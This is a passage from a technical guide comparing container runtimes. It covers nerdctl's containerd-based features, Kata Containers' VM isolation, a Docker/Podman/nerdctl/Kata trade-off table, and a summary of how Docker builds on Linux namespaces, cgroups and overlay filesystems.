nerdctl is a Docker-compatible CLI that talks directly to containerd via gRPC — completely bypassing dockerd. The architecture is simpler than Docker's (no extra daemon layer on top of containerd) but still daemon-based, since containerd itself runs as a persistent service.

The goal of nerdctl is to facilitate experimenting with cutting-edge features of containerd that are not present in Docker, including on-demand image pulling (lazy-pulling) and image encryption/decryption.

The standout features that nerdctl exposes — which Docker does not yet support natively — include:

Lazy pulling (eStargz / Nydus / SOCI): Traditional image pulls download every layer before the container can start. Lazy pulling streams layers on demand — the container starts running while layers it hasn't touched yet are still downloading. This can dramatically reduce cold-start times for large images.

Image encryption (OCIcrypt): Layers can be encrypted at rest and in transit. The decryption key is provided at runtime, meaning even a compromised registry can't expose image contents.

P2P image distribution (IPFS): Images can be pushed and pulled over IPFS, removing reliance on centralized registries entirely.

Image signing (cosign): Native --verify=cosign on pull and --sign=cosign on push, bringing software supply chain security into the CLI workflow.

Unlike ctr (containerd's own debugging CLI), nerdctl aims to be user-friendly and Docker-compatible. To some extent, nerdctl + containerd can seamlessly replace docker + dockerd. It also supports nerdctl compose, making multi-container workflow migration straightforward.

12.5 Kata Containers — VM-Based Isolation

All three tools above (Docker, Podman, nerdctl) share the same fundamental isolation boundary: Linux namespaces and cgroups on a shared kernel. If a kernel vulnerability is exploited, isolation can be broken. Kata Containers solves this by replacing the namespace boundary with a hardware virtualization boundary.

At its core, Kata Containers sits underneath your existing container runtime and launches every container (or pod) inside a lightweight VM. Each container gets its own guest kernel running inside a microVM spawned by a hypervisor (QEMU, Cloud-Hypervisor, or AWS Firecracker).

The Kata Container runtime launches each container within its own hardware-isolated VM, and each VM has its own kernel. Due to this higher degree of isolation, certain container capabilities cannot be supported or are implicitly enabled through the VM.

The trade-off is cold-start latency and memory overhead. Although improving, booting VMs takes longer than containers, and VMs have more overhead than namespace-based containers. Firecracker (AWS's microVM hypervisor) has brought boot times down to around 125ms, making this viable for serverless and multi-tenant workloads — but it's still measurably slower than a pure namespace-based container.

12.6 Head-to-Head: The Architectural Trade-offs

Tool	Daemon?	Rootless by default?	Isolation boundary	Kernel shared?	Best fit
🐋 Docker (Engine 28.x)	✅ `dockerd` (persistent, root)	❌ Rootful by default	Namespaces + cgroups	✅ Yes	Developer experience, ecosystem breadth, CI/CD integration
🦑 Podman (5.x)	❌ None (fork/exec model)	✅ Yes (user namespaces)	Namespaces + cgroups	✅ Yes	Security-first, Kubernetes alignment, enterprise / regulated
📦 nerdctl (2.x)	✅ `containerd` (lightweight)	⚠️ Supported, not default	Namespaces + cgroups	✅ Yes	Cutting-edge features, lazy pull / encryption, K8s debugging
🛡️ Kata Containers	✅ `containerd` + kata-shim	N/A (VM boundary)	Hardware VM (KVM / Firecracker)	❌ Each container = own kernel	Multi-tenant clouds, regulated workloads, untrusted code

The table above captures the facts — but the why behind those choices becomes clearer when you see where each tool lands on the isolation vs. performance spectrum:

12.7 When to Choose What

The decision is not about which tool is "best" — it's about which architectural trade-off matches your threat model and operational context.

Choose Docker when developer experience and ecosystem breadth matter most. Your team already knows it, your CI/CD pipelines already use it, and you need the widest tool compatibility. It remains the de facto standard for local development and remains deeply integrated into every major cloud platform.

Choose Podman when security posture is the primary concern. If you're in a regulated industry, running shared CI runners where multiple teams' code executes on the same host, or deploying on immutable Linux distributions (Fedora Atomic, Silverblue, Bazzite), Podman's daemonless and rootless-by-default architecture eliminates entire categories of attack surface. Its native pod model also makes it a natural fit for teams building toward Kubernetes-native workflows.

Choose nerdctl when you want to push the boundaries of what containers can do. Lazy pulling, encrypted images, P2P distribution, and cosign verification are features that don't exist in Docker today. It's also the best tool for understanding containerd's internals directly — since it bypasses dockerd entirely, you're seeing the runtime with one fewer abstraction layer.

Choose Kata Containers when the shared-kernel threat model is unacceptable. Multi-tenant clouds running untrusted customer code, serverless platforms, or workloads that need compliance-grade proof of isolation all benefit from the hard VM boundary that namespaces alone cannot provide. Kata integrates cleanly into Kubernetes via the CRI interface, so it doesn't require rewriting orchestration logic.

In practice, these tools coexist. A single Kubernetes cluster might run routine workloads with runc-backed containerd, security-sensitive jobs with Kata, and use Podman on developer laptops. The result is not competition but coexistence: Docker for accessibility, Podman for compliance and integration. The OCI standards ensure the images are interoperable regardless of which runtime executes them.

13. Summary and Key Takeaways

Docker's power comes from its elegant composition of existing Linux primitives — it invented none of the underlying technology. Namespaces existed since Linux 2.6.24 (2008). cgroups were added in 2.6.24 as well. Overlay filesystems predate Docker by years.

What Docker did was package these primitives into a developer-friendly workflow: a simple CLI, a declarative image format, a global registry, and a composable networking model. The internals are surprisingly simple once you see the full picture — it's the orchestration layer on top that makes it powerful.

Understanding these internals gives you the ability to:

Debug container issues at the kernel level (/proc, cgroup filesystem, namespace inspection)
Optimize images by understanding layer caching and CoW
Harden security by knowing exactly where the isolation boundaries are
Choose alternatives (containerd directly, Podman, kata-containers) with full knowledge of the tradeoffs

Table of Contents